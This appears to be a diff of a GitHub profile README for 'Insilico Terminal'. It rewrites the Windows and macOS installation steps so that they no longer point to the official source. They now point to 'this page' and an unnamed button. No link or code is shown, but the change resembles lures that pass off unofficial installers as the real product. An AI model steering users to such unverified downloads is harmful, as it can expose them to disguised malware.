Insilico-Terminal/.github/profile/README.md

 ## Installation Instructions

 ### For Windows
-1. Get the **Insilico Terminal installer** from the official source.
+1. Get the **Insilico Terminal installer** from this page.
 2. Launch the `.exe` file and follow the step-by-step installation guide.
 3. Sign in with your **Insilico account** to begin using the platform.

 ### For macOS
-1. Use the Mac button above to access the official Insilico Terminal page.
-2. Download the appropriate package for macOS.
-3. Drag the application to your Applications folder and open it to log in.
+1. Go to the installation site using the button above.
+2. Follow the instructions on the installation page to install the program correctly

 ---